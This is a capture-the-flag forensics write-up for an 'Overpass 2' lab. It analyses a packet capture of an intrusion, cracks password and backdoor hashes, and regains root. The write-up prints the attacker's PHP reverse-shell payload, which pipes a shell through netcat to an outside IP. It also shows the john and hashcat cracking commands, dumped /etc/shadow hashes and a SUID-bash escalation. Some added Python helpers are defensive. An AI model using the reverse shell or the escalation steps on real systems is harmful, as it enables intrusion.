🧑🔬 OVERPASS 2 - HACKED
1. Forensic analysis:
Open Wireshark and load the capture file (overpass2.pcapng).
Filter the packets by the HTTP protocol.
Look for the path "/development/upload.php".
Analyse the payload of payload.php to see how the reverse shell command was executed.
We also search the capture with tshark filters:
tshark -r overpass2.pcapng -x | strings | grep -A 5 ".php"
tshark -r overpass2.pcapng -T fields -e data | xxd -r -p | strings
Payload of payload.php (PHP):
<?php
exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f");
?>
2. Privilege escalation:
Search the Wireshark capture for the command "sudo".
We see the password "siemprequenoteartinstant" that the attacker used to run the command with superuser privileges.
su james
3. Persistence:
Search the Wireshark capture for the command "git clone".
We see that the attacker cloned the GitHub repository "https://github.com/NinjaJc01/ssh-backdoor".
4. Gaining access:
The passwords of 4 of the 5 users the attacker saw in /etc/shadow are cracked, using John the Ripper and a wordlist.
john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt --pot=results_james.txt passwdjame.txt
The SSH backdoor hash is cracked with hashcat, but first we save the hash the attacker used when running the SSH backdoor, together with the salt contained in that script, in a file laid out as hash:salt.
┌──(root㉿kalipaimon)-[/home/paimon/Descargas/jonhborrar]
└─# cat hashlistoparajondos.txt
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:1c362db832f3f864c8c2fe05f2002a05
We use ssh to connect to the system with the "james" account and the password "november16".
Command to crack the SSH backdoor hash:
hashcat -a 0 -m 1710 hashlistoparajondos.txt /usr/share/wordlists/rockyou.txt
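Before spending time on a wordlist run it is worth confirming that the chosen mode really matches the scheme the backdoor used. hashcat mode 1710 is sha512($pass.$salt): a single SHA-512 over the password bytes immediately followed by the salt bytes, hex-encoded. The following Python is an added example, not code from this writeup or from the ssh-backdoor project: it parses the hash:salt line saved above, implements that scheme, and checks a small constructed candidate list against it. The candidate list and the function names are the example's own assumptions.

```python
import hashlib
from typing import Iterable, Optional, Tuple

# The hash:salt line saved in the file above, copied from this page. The saved
# file repeats the salt after a second colon; only the first two fields matter.
HASH_LINE = ("6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3"
             "e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed"
             ":1c362db832f3f864c8c2fe05f2002a05:1c362db832f3f864c8c2fe05f2002a05")

# Constructed stand-in for a wordlist; it includes the password the writeup
# reports for the backdoor so the demo has something to find.
CANDIDATES = ["password", "letmein", "overpass", "november16", "winter2020"]


def parse_hash_line(line: str) -> Tuple[str, str]:
    """Return (hash_hex, salt) from a hashcat-style 'hash:salt[:...]' line."""
    fields = line.strip().split(":")
    if len(fields) < 2:
        raise ValueError("expected hash:salt")
    digest = fields[0].lower()
    if len(digest) != 128 or any(c not in "0123456789abcdef" for c in digest):
        raise ValueError("first field is not a hex SHA-512 digest")
    return digest, fields[1]


def sha512_pass_salt(password: str, salt: str) -> str:
    """hashcat mode 1710, sha512($pass.$salt): one SHA-512 over pass || salt."""
    return hashlib.sha512(password.encode() + salt.encode()).hexdigest()


def find_match(target: str, salt: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose sha512($pass.$salt) equals target, else None."""
    target = target.lower()
    for cand in candidates:
        if sha512_pass_salt(cand, salt) == target:
            return cand
    return None


if __name__ == "__main__":
    digest, salt = parse_hash_line(HASH_LINE)
    print("salt:", salt, "match:", find_match(digest, salt, CANDIDATES))
```

Because mode 1710 is one raw SHA-512 per guess, even a CPU tests millions of candidates per second, which is why a plain rockyou.txt run is enough against it. The /etc/shadow entries handled in section 4 use sha512crypt ($6$), which iterates thousands of rounds per guess; that is the reason those go through john --format=sha512crypt instead and take far longer per candidate.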
5. Privilege elevation:
Run the ".suid_bash" file with the "-p" flag to get root privileges. We found this parameter in the options of the suid_bash script: passing it a bogus -j or -h printed the list of parameters it accepts, and -p said it lets the script, carrying root's SUID bit, reach every path in $PATH, so from there we could run any command as ROOT, and it worked.
Command to get root privileges:
./.suid_bash -p
Result:
Control of the system is recovered and the user and ROOT flags are obtained.
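From the defender's side, the persistence used in this step is a root-owned setuid copy of a shell hidden as a dotfile, which is exactly what a periodic setuid sweep should catch. The following Python is an added example, not code from this writeup: it walks a directory tree without following symlinks, lists every regular file with the setuid bit together with its owner uid, and flags hidden names. The demo builds a constructed temporary directory with one hidden setuid file so it runs anywhere; the function names are the example's own.

```python
import os
import shutil
import stat
import tempfile
from typing import List, Optional, Tuple


def find_setuid_files(root: str, owner_uid: Optional[int] = None) -> List[Tuple[str, int, bool]]:
    """Return (path, owner_uid, hidden) for every regular file under root whose
    setuid bit is set, optionally restricted to one owner (0 for root-owned on a
    real host). 'hidden' is True for dotfiles like the .suid_bash copy above.
    Symlinks are not followed, so a link cannot pull in files outside root."""
    hits: List[Tuple[str, int, bool]] = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable entry; keep scanning
            if not stat.S_ISREG(st.st_mode) or not (st.st_mode & stat.S_ISUID):
                continue
            if owner_uid is not None and st.st_uid != owner_uid:
                continue
            hits.append((path, st.st_uid, name.startswith(".")))
    return sorted(hits)


def demo_scan() -> List[Tuple[str, int, bool]]:
    """Build a constructed tree (one hidden setuid script, one plain file, one
    setuid file in a subdirectory), scan it, clean up, and return the hits
    with paths relative to the temporary root."""
    root = tempfile.mkdtemp(prefix="suid_demo_")
    try:
        os.mkdir(os.path.join(root, "bin"))
        files = {".suid_bash": 0o4755, "notes.txt": 0o644, os.path.join("bin", "tool"): 0o4755}
        for rel, mode in files.items():
            path = os.path.join(root, rel)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\necho constructed demo\n")
            os.chmod(path, mode)
        return [(os.path.relpath(p, root), uid, hidden) for p, uid, hidden in find_setuid_files(root)]
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for rel, uid, hidden in demo_scan():
        print(f"{rel}\towner uid {uid}\t{'HIDDEN' if hidden else ''}")
```

On a real host the same sweep is `find / -perm -4000 -type f`, run with `owner_uid=0` here to keep only root-owned hits; compare the result against a known-good baseline, since legitimate setuid binaries (su, passwd, sudo) are expected and a shell copy in a home directory is not.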
OFFENSIVE PENTESTING:
Overpass 2 - Hacked:
We download the .pcap file that was captured while monitoring the network during the attack we received, then verify the file's integrity with md5sum, which checks out:
┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# md5sum overpass2.pcapng
11c3b2e9221865580295bc662c35c6dc overpass2.pcapng
--------------------------- WIRESHARK ------------------------------
Skimming the file we immediately see this information: a file-upload request from the (attacker) IP 192.168.170.145 to our server, the (victim) IP 192.168.170.159, with a GET request to the path /development/uploads/payload.php:
PAYLOAD PACKET:
Internet Protocol Version 4, Src: 192.168.170.145, Dst: 192.168.170.159
Transmission Control Protocol, Src Port: 47736, Dst Port: 80, Seq: 1, Ack: 1, Len: 400
Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
http://192.168.170.159/development/uploads/payload.php
0000 00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00 ..)n....)..H..E.
0010 01 c4 51 81 40 00 40 06 11 31 c0 a8 aa 91 c0 a8 ..Q.@.@..1......
0020 aa 9f ba 78 00 50 e0 79 05 4f c6 62 99 6d 80 18 ...x.P.y.O.b.m..
0030 01 f6 59 5e 00 00 01 01 08 0a c2 13 f6 dc 35 50 ..Y^..........5P
0040 7d 77 47 45 54 20 2f 64 65 76 65 6c 6f 70 6d 65 }wGET /developme
0050 6e 74 2f 75 70 6c 6f 61 64 73 2f 70 61 79 6c 6f nt/uploads/paylo
0060 61 64 2e 70 68 70 20 48 54 54 50 2f 31 2e 31 0d ad.php HTTP/1.1.
0070 0a 48 6f 73 74 3a 20 31 39 32 2e 31 36 38 2e 31 .Host: 192.168.1
0080 37 30 2e 31 35 39 0d 0a 55 73 65 72 2d 41 67 65 70.159..User-Age
0090 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 nt: Mozilla/5.0
00a0 28 58 31 31 3b 20 4c 69 6e 75 78 20 78 38 36 5f (X11; Linux x86_
00b0 36 34 3b 20 72 76 3a 36 38 2e 30 29 20 47 65 63 64; rv:68.0) Gec
00c0 6b 6f 2f 32 30 31 30 30 31 30 31 20 46 69 72 65 ko/20100101 Fire
00d0 66 6f 78 2f 36 38 2e 30 0d 0a 41 63 63 65 70 74 fox/68.0..Accept
00e0 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 6c : text/html,appl
00f0 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d ication/xhtml+xm
0100 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 6d l,application/xm
0110 6c 3b 71 3d 30 2e 39 2c 2a 2f 2a 3b 71 3d 30 2e l;q=0.9,*/*;q=0.
0120 38 0d 0a 41 63 63 65 70 74 2d 4c 61 6e 67 75 61 8..Accept-Langua
0130 67 65 3a 20 65 6e 2d 55 53 2c 65 6e 3b 71 3d 30 ge: en-US,en;q=0
0140 2e 35 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 .5..Accept-Encod
0150 69 6e 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 ing: gzip, defla
0160 74 65 0d 0a 52 65 66 65 72 65 72 3a 20 68 74 74 te..Referer: htt
0170 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 37 30 2e p://192.168.170.
0180 31 35 39 2f 64 65 76 65 6c 6f 70 6d 65 6e 74 2f 159/development/
0190 75 70 6c 6f 61 64 73 2f 0d 0a 43 6f 6e 6e 65 63 uploads/..Connec
01a0 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 tion: keep-alive
01b0 0d 0a 55 70 67 72 61 64 65 2d 49 6e 73 65 63 75 ..Upgrade-Insecu
01c0 72 65 2d 52 65 71 75 65 73 74 73 3a 20 31 0d 0a re-Requests: 1..
01d0 0d 0a ..
Reverse shell transmission packet: we see that it requested, and we sent it, the cat of /etc/passwd. We also detect that its reverse shell is listening on port 4242 of the attacker IP, and the replies go out from our port 57680:
Internet Protocol Version 4, Src: 192.168.170.159, Dst: 192.168.170.145
Transmission Control Protocol, Src Port: 57680, Dst Port: 4242, Seq: 1543, Ack: 171, Len: 1462
0000 00 0c 29 17 ba 48 00 0c 29 6e 18 17 08 00 45 00 ..)..H..)n....E.
0010 05 ea ae bd 40 00 40 06 af ce c0 a8 aa 9f c0 a8 ....@.@.........
0020 aa 91 e1 50 10 92 09 61 b5 64 67 a7 d5 31 80 18 ...P...a.dg..1..
0030 01 f6 dc 5e 00 00 01 01 08 0a 35 51 84 97 c2 14 ...^......5Q....
0040 fd f8 72 6f 6f 74 3a 2a 3a 31 38 32 39 35 3a 30 ..root:*:18295:0
0050 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 64 61 65 :99999:7:::..dae
0060 6d 6f 6e 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 mon:*:18295:0:99
0070 39 39 39 3a 37 3a 3a 3a 0d 0a 62 69 6e 3a 2a 3a 999:7:::..bin:*:
0080 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a 18295:0:99999:7:
0090 3a 3a 0d 0a 73 79 73 3a 2a 3a 31 38 32 39 35 3a ::..sys:*:18295:
00a0 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 73 79 0:99999:7:::..sy
00b0 6e 63 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 nc:*:18295:0:999
00c0 39 39 3a 37 3a 3a 3a 0d 0a 67 61 6d 65 73 3a 2a 99:7:::..games:*
00d0 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 :18295:0:99999:7
00e0 3a 3a 3a 0d 0a 6d 61 6e 3a 2a 3a 31 38 32 39 35 :::..man:*:18295
00f0 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 6c :0:99999:7:::..l
0100 70 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 p:*:18295:0:9999
0110 39 3a 37 3a 3a 3a 0d 0a 6d 61 69 6c 3a 2a 3a 31 9:7:::..mail:*:1
0120 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 8295:0:99999:7::
0130 3a 0d 0a 6e 65 77 73 3a 2a 3a 31 38 32 39 35 3a :..news:*:18295:
0140 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 75 75 0:99999:7:::..uu
0150 63 70 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 cp:*:18295:0:999
0160 39 39 3a 37 3a 3a 3a 0d 0a 70 72 6f 78 79 3a 2a 99:7:::..proxy:*
0170 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 :18295:0:99999:7
0180 3a 3a 3a 0d 0a 77 77 77 2d 64 61 74 61 3a 2a 3a :::..www-data:*:
0190 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a 18295:0:99999:7:
01a0 3a 3a 0d 0a 62 61 63 6b 75 70 3a 2a 3a 31 38 32 ::..backup:*:182
01b0 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 95:0:99999:7:::.
01c0 0a 6c 69 73 74 3a 2a 3a 31 38 32 39 35 3a 30 3a .list:*:18295:0:
01d0 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 69 72 63 3a 99999:7:::..irc:
01e0 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a *:18295:0:99999:
01f0 37 3a 3a 3a 0d 0a 67 6e 61 74 73 3a 2a 3a 31 38 7:::..gnats:*:18
0200 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 295:0:99999:7:::
0210 0d 0a 6e 6f 62 6f 64 79 3a 2a 3a 31 38 32 39 35 ..nobody:*:18295
0220 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 73 :0:99999:7:::..s
0230 79 73 74 65 6d 64 2d 6e 65 74 77 6f 72 6b 3a 2a ystemd-network:*
0240 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 :18295:0:99999:7
0250 3a 3a 3a 0d 0a 73 79 73 74 65 6d 64 2d 72 65 73 :::..systemd-res
0260 6f 6c 76 65 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 olve:*:18295:0:9
0270 39 39 39 39 3a 37 3a 3a 3a 0d 0a 73 79 73 6c 6f 9999:7:::..syslo
0280 67 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 g:*:18295:0:9999
0290 39 3a 37 3a 3a 3a 0d 0a 6d 65 73 73 61 67 65 62 9:7:::..messageb
02a0 75 73 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 us:*:18295:0:999
02b0 39 39 3a 37 3a 3a 3a 0d 0a 5f 61 70 74 3a 2a 3a 99:7:::.._apt:*:
02c0 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a 18295:0:99999:7:
02d0 3a 3a 0d 0a 6c 78 64 3a 2a 3a 31 38 32 39 35 3a ::..lxd:*:18295:
02e0 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 75 75 0:99999:7:::..uu
02f0 69 64 64 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 idd:*:18295:0:99
0300 39 39 39 3a 37 3a 3a 3a 0d 0a 64 6e 73 6d 61 73 999:7:::..dnsmas
0310 71 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 q:*:18295:0:9999
0320 39 3a 37 3a 3a 3a 0d 0a 6c 61 6e 64 73 63 61 70 9:7:::..landscap
0330 65 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 e:*:18295:0:9999
0340 39 3a 37 3a 3a 3a 0d 0a 70 6f 6c 6c 69 6e 61 74 9:7:::..pollinat
0350 65 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 e:*:18295:0:9999
0360 39 3a 37 3a 3a 3a 0d 0a 73 73 68 64 3a 2a 3a 31 9:7:::..sshd:*:1
0370 38 34 36 34 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 8464:0:99999:7::
0380 3a 0d 0a 6a 61 6d 65 73 3a 24 36 24 37 47 53 35 :..james:$6$7GS5
0390 65 2e 79 76 24 48 71 49 48 35 4d 74 68 70 47 57 e.yv$HqIH5MthpGW
03a0 70 63 7a 72 33 4d 6e 77 44 48 6c 45 44 38 67 62 pczr3MnwDHlED8gb
03b0 56 53 48 74 37 6d 61 38 79 78 7a 42 4d 38 4c 75 VSHt7ma8yxzBM8Lu
03c0 42 52 65 44 56 35 65 31 50 75 2f 56 75 52 73 6b BReDV5e1Pu/VuRsk
03d0 75 67 74 31 43 6b 75 6c 2f 53 4b 47 58 2e 35 50 ugt1Ckul/SKGX.5P
03e0 79 4d 70 7a 41 59 6f 33 43 67 2f 3a 31 38 34 36 yMpzAYo3Cg/:1846
03f0 34 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 4:0:99999:7:::..
0400 70 61 72 61 64 6f 78 3a 24 36 24 6f 52 58 51 75 paradox:$6$oRXQu
0410 34 33 58 24 57 61 41 6a 33 5a 2f 34 73 45 50 56 43X$WaAj3Z/4sEPV
0420 31 6d 4a 64 48 73 79 4a 6b 49 5a 6d 31 72 6a 6a 1mJdHsyJkIZm1rjj
0430 6e 4e 78 72 59 35 63 38 47 45 6c 4a 49 6a 47 37 nNxrY5c8GElJIjG7
0440 75 33 36 78 53 67 4d 47 77 4b 41 32 77 6f 44 49 u36xSgMGwKA2woDI
0450 46 75 64 74 79 71 59 33 37 59 43 79 75 6b 69 48 FudtyqY37YCyukiH
0460 4a 50 68 69 34 49 55 37 48 30 3a 31 38 34 36 34 JPhi4IU7H0:18464
0470 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 73 :0:99999:7:::..s
0480 7a 79 6d 65 78 3a 24 36 24 42 2e 45 6e 75 58 69 zymex:$6$B.EnuXi
0490 4f 24 66 2f 75 30 30 48 6f 73 5a 49 4f 33 55 51 O$f/u00HosZIO3UQ
04a0 43 45 4a 70 6c 61 7a 6f 51 74 48 38 57 4a 6a 53 CEJplazoQtH8WJjS
04b0 58 2f 6f 6f 42 6a 77 6d 59 66 45 4f 54 63 71 43 X/ooBjwmYfEOTcqC
04c0 41 6c 4d 6a 65 46 49 67 59 57 71 52 35 41 6a 32 AlMjeFIgYWqR5Aj2
04d0 76 73 66 52 79 66 36 78 31 77 58 78 4b 69 74 63 vsfRyf6x1wXxKitc
04e0 50 55 6a 63 58 6c 58 2f 3a 31 38 34 36 34 3a 30 PUjcXlX/:18464:0
04f0 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 62 65 65 :99999:7:::..bee
0500 3a 24 36 24 2e 53 71 48 72 70 36 7a 24 42 34 72 :$6$.SqHrp6z$B4r
0510 57 50 69 30 48 6b 6a 30 67 62 51 4d 46 75 6a 7a WPi0Hkj0gbQMFujz
0520 31 4b 48 56 73 39 56 72 53 46 75 37 41 55 39 43 1KHVs9VrSFu7AU9C
0530 78 57 72 5a 56 37 47 7a 48 30 35 74 59 50 4c 31 xWrZV7GzH05tYPL1
0540 78 52 7a 55 4a 6c 46 48 62 79 70 30 4b 39 54 41 xRzUJlFHbyp0K9TA
0550 65 59 31 4d 36 6e 69 46 73 65 42 39 56 4c 42 57 eY1M6niFseB9VLBW
0560 53 6f 30 3a 31 38 34 36 34 3a 30 3a 39 39 39 39 So0:18464:0:9999
0570 39 3a 37 3a 3a 3a 0d 0a 6d 75 69 72 6c 61 6e 64 9:7:::..muirland
0580 3a 24 36 24 53 57 79 62 53 38 6f 32 24 39 64 69 :$6$SWybS8o2$9di
0590 76 65 51 69 6e 78 79 38 50 4a 51 6e 47 51 51 57 veQinxy8PJQnGQQW
05a0 62 54 4e 4b 65 62 32 41 69 53 70 2e 69 38 4b 7a bTNKeb2AiSp.i8Kz
05b0 6e 75 41 6a 59 62 71 49 33 71 30 34 52 66 35 68 nuAjYbqI3q04Rf5h
05c0 6a 48 50 65 72 33 77 65 69 43 2e 32 4d 72 4f 6a jHPer3weiC.2MrOj
05d0 32 6f 31 53 77 2f 66 64 32 63 75 30 6b 43 36 64 2o1Sw/fd2cu0kC6d
05e0 55 50 2e 3a 31 38 34 36 34 3a 30 3a 39 39 39 39 UP.:18464:0:9999
05f0 39 3a 37 3a 3a 3a 0d 0a 9:7:::..
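The hex dump above can be turned back into bytes and inspected without Wireshark, and it also shows why section 4 could crack only some of the accounts: most entries carry "*" instead of a hash. The following Python is an added example, not code from this writeup. It parses tshark -x style dump lines (the first seven lines of the frame above, copied as a constructed sample; the rest of the frame is left out), walks the Ethernet, IPv4 and TCP headers to recover the ports and payload, splits the shell output into complete lines plus the unterminated fragment that continues in the next segment, and classifies each account by whether its password field holds a hash a wordlist run could even attempt. SHADOW_EXCERPT is constructed to show the crackable case; its $6$ value is a placeholder, not a real hash, and all function names are the example's own.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: the first seven dump lines of frame 114 above (victim
# 192.168.170.159:57680 -> attacker 192.168.170.145:4242), copied from this
# page; the remaining lines of the frame are deliberately left out.
SAMPLE_DUMP = """\
0000 00 0c 29 17 ba 48 00 0c 29 6e 18 17 08 00 45 00 ..)..H..)n....E.
0010 05 ea ae bd 40 00 40 06 af ce c0 a8 aa 9f c0 a8 ....@.@.........
0020 aa 91 e1 50 10 92 09 61 b5 64 67 a7 d5 31 80 18 ...P...a.dg..1..
0030 01 f6 dc 5e 00 00 01 01 08 0a 35 51 84 97 c2 14 ...^......5Q....
0040 fd f8 72 6f 6f 74 3a 2a 3a 31 38 32 39 35 3a 30 ..root:*:18295:0
0050 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 64 61 65 :99999:7:::..dae
0060 6d 6f 6e 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 mon:*:18295:0:99
"""

# Constructed shadow(5) excerpt with a placeholder $6$ entry (not a real hash).
SHADOW_EXCERPT = (
    "sshd:*:18464:0:99999:7:::\n"
    "james:$6$EXAMPLEsalt$EXAMPLEhash:18464:0:99999:7:::\n"
    "backup:!:18464:0:99999:7:::\n"
)

OFFSET = re.compile(r"^[0-9a-fA-F]{4,8}$")
HEX_BYTE = re.compile(r"^[0-9a-fA-F]{2}$")
# Standard crypt(3) identifier prefixes as they appear in /etc/shadow.
CRYPT_IDS = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}


def hexdump_to_bytes(text: str) -> bytes:
    """Parse 'offset hh hh ... ascii' lines (tshark -x / Wireshark style).
    At most 16 byte tokens are read per line, stopping at the first token that
    is not two hex digits, so the trailing ASCII column is ignored."""
    out = bytearray()
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) < 2 or not OFFSET.match(tokens[0]):
            continue
        for tok in tokens[1:17]:
            if not HEX_BYTE.match(tok):
                break
            out.append(int(tok, 16))
    return bytes(out)


def tcp_payload(frame: bytes) -> Tuple[int, int, bytes]:
    """Walk Ethernet II -> IPv4 -> TCP and return (src_port, dst_port, payload).
    The IPv4 total length bounds the payload so Ethernet padding is excluded;
    a frame cut short (like the sample) simply yields the bytes present."""
    if len(frame) < 54 or frame[12:14] != b"\x08\x00":
        raise ValueError("not an Ethernet II / IPv4 frame")
    ihl = (frame[14] & 0x0F) * 4
    if frame[23] != 6:
        raise ValueError("IP protocol is not TCP")
    ip_total = int.from_bytes(frame[16:18], "big")
    tcp = 14 + ihl
    src_port = int.from_bytes(frame[tcp:tcp + 2], "big")
    dst_port = int.from_bytes(frame[tcp + 2:tcp + 4], "big")
    data_offset = (frame[tcp + 12] >> 4) * 4
    end = min(len(frame), 14 + ip_total)
    return src_port, dst_port, frame[tcp + data_offset:end]


def split_shell_lines(payload: bytes) -> Tuple[List[str], str]:
    """Split reverse-shell output into complete lines and the unterminated tail.
    A TCP segment can end mid-line; the tail belongs to the next segment."""
    text = payload.decode("utf-8", errors="replace").replace("\r\n", "\n")
    parts = text.split("\n")
    tail = parts.pop()  # '' when the output ended with a newline
    return [p for p in parts if p], tail


def classify_accounts(lines: List[str]) -> Dict[str, str]:
    """Map user -> hash algorithm name, 'no hash' (locked or empty field) or
    'unknown' for shadow(5)-style lines; lines without nine fields are skipped."""
    result: Dict[str, str] = {}
    for line in lines:
        fields = line.split(":")
        if len(fields) != 9:
            continue
        user, pw = fields[0], fields[1]
        if pw in ("", "*") or pw.startswith("!"):
            result[user] = "no hash"
        else:
            result[user] = CRYPT_IDS.get(pw[:3], "unknown")
    return result


def crackable_users(lines: List[str]) -> List[str]:
    """Users whose field holds a real crypt(3) hash, i.e. the only ones a
    wordlist run like the john command in section 4 can attempt."""
    return [u for u, kind in classify_accounts(lines).items() if kind in CRYPT_IDS.values()]


if __name__ == "__main__":
    sport, dport, payload = tcp_payload(hexdump_to_bytes(SAMPLE_DUMP))
    lines, tail = split_shell_lines(payload)
    print(f"{sport} -> {dport}: {classify_accounts(lines)}  (unfinished line: {tail!r})")
    excerpt_lines, _ = split_shell_lines(SHADOW_EXCERPT.encode())
    print("crackable:", crackable_users(excerpt_lines))
```

The header walk is what makes the result trustworthy: the payload starts at 14 + IHL*4 + data offset*4 (66 bytes here, matching the 1528-byte frame with Len=1462 in the tshark listing), so the two stray bytes "fd f8" before "root" are correctly recognised as the tail of the TCP timestamp option rather than as shell output. Splitting off the unterminated tail matters when reassembling a stream by hand, because the daemon line in this segment is completed only by the next one.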
We also see the terminal prompt the attacker's reverse shell got when it connected to our server, and the user it took control of, james, on the company machine overpass:
Internet Protocol Version 4, Src: 192.168.170.159, Dst: 192.168.170.145
Transmission Control Protocol, Src Port: 57680, Dst Port: 4242, Seq: 3005, Ack: 171, Len: 29
0000 00 0c 29 17 ba 48 00 0c 29 6e 18 17 08 00 45 00 ..)..H..)n....E.
0010 00 51 ae bf 40 00 40 06 b5 65 c0 a8 aa 9f c0 a8 .Q..@.@..e......
0020 aa 91 e1 50 10 92 09 61 bb 1a 67 a7 d5 31 80 18 ...P...a..g..1..
0030 01 f6 4f 91 00 00 01 01 08 0a 35 51 84 97 c2 14 ..O.......5Q....
0040 fd fc 6a 61 6d 65 73 40 6f 76 65 72 70 61 73 73 ..james@overpass
0050 2d 70 72 6f 64 75 63 74 69 6f 6e 3a 7e 24 20 -production:~$
We also see that it had our victim machine clone an ssh-backdoor repo from GitHub (git clone https://github.com/NinjaJc01/ssh-backdoor):
Internet Protocol Version 4, Src: 192.168.170.145, Dst: 192.168.170.159
Transmission Control Protocol, Src Port: 4242, Dst Port: 57680, Seq: 171, Ack: 3034, Len: 52
0000 00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00 ..)n....)..H..E.
0010 00 68 77 75 40 00 40 06 ec 98 c0 a8 aa 91 c0 a8 .hwu@.@.........
0020 aa 9f 10 92 e1 50 67 a7 d5 31 09 61 bb 37 80 18 .....Pg..1.a.7..
0030 01 f5 2a 8b 00 00 01 01 08 0a c2 15 86 21 35 51 ..*..........!5Q
0040 84 97 67 69 74 20 63 6c 6f 6e 65 20 68 74 74 70 ..git clone http
0050 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4e s://github.com/N
0060 69 6e 6a 61 4a 63 30 31 2f 73 73 68 2d 62 61 63 injaJc01/ssh-bac
0070 6b 64 6f 6f 72 0a kdoor.
------------------------------ TSHARK -----------------------------
Fine, we have seen the information in broad strokes, but we need to analyse it more comfortably and faster, and I think we'll do that with tshark, filtering through a pipeline with grep:
We read the raw file:
┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng
Running as user "root" and group "root". This could be dangerous.
1 0.000000000 192.168.170.145 → 192.168.170.159 TCP 74 47732 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=3256059711 TSecr=0 WS=128
2 0.000122542 192.168.170.159 → 192.168.170.145 TCP 74 80 → 47732 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0 MSS=1460 SACK_PERM TSval=894438874 TSecr=3256059711 WS=128
3 0.000211854 192.168.170.145 → 192.168.170.159 TCP 66 47732 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0 TSval=3256059711 TSecr=894438874
4 0.000326676 192.168.170.145 → 192.168.170.159 HTTP 484 GET /development/ HTTP/1.1
5 0.000342046 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47732 [ACK] Seq=1 Ack=419 Win=64768 Len=0 TSval=894438874 TSecr=3256059711
6 0.000860947 192.168.170.159 → 192.168.170.145 HTTP 1078 HTTP/1.1 200 OK (text/html)
7 0.000863357 192.168.170.145 → 192.168.170.159 TCP 66 47732 → 80 [ACK] Seq=419 Ack=1013 Win=64128 Len=0 TSval=3256059712 TSecr=894438875
8 5.002042815 192.168.170.145 → 192.168.170.159 TCP 66 47732 → 80 [FIN, ACK] Seq=419 Ack=1013 Win=64128 Len=0 TSval=3256064713 TSecr=894438875
9 5.002197308 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47732 [FIN, ACK] Seq=1013 Ack=420 Win=64768 Len=0 TSval=894443876 TSecr=3256064713
10 5.002289760 192.168.170.145 → 192.168.170.159 TCP 66 47732 → 80 [ACK] Seq=420 Ack=1014 Win=64128 Len=0 TSval=3256064713 TSecr=894443876
